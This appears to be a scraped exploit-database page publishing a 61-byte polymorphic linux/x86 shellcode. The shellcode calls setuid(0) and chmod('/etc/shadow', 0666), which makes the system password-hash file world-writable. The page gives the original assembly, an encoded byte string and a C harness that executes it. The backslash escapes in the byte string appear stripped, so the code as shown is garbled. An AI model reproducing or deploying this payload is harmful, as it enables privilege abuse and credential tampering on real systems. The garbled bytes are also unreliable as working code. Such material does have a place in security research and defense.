[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Byte
# Published : 2010-05-31
# Author : antrhacks
# Previous Title : Linux x86 - ip6tables -F - 47 bytes
# Next Title : change mode 0777 of "/etc/shadow" with sys_chmod syscall
=============================================================================================
linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes
=============================================================================================
/*
* Title: linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes
* Encode : _ADD
* Author: antrhacks
* Platform: Linux X86
*/
/* 0riginAl ASSembly
31 db xor %ebx,%ebx
b0 17 mov $0x17,%al
cd 80 int $0x80
31 c0 xor %eax,%eax
50 push %eax
68 61 64 6f 77 push $0x776f6461
68 63 2f 73 68 push $0x68732f63
68 2f 2f 65 74 push $0x74652f2f
89 e3 mov %esp,%ebx
66 b9 b6 01 mov $0x1b6,%cx
b0 0f mov $0xf,%al
cd 80 int $0x80
40 inc %eax
cd 80 int $0x80
*/
#include "stdio.h"
char shellcode[] = "xebx11x5ex31xc9xb1x37x80x6cx0exffx13"
"x80xe9x01x75xf6xebx05xe8xeaxffxffxff"
"x44xeexc3x2axe0x93x44xd3x63x7bx74x77x82x8ax7bx76x42x86x7bx7bx42x42x78x87x9c"
"xf6x79xccxc9x14xc3x22xe0x93x53xe0x93";
int main()
{
printf(" [*] Polymorphic Shellcode - length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}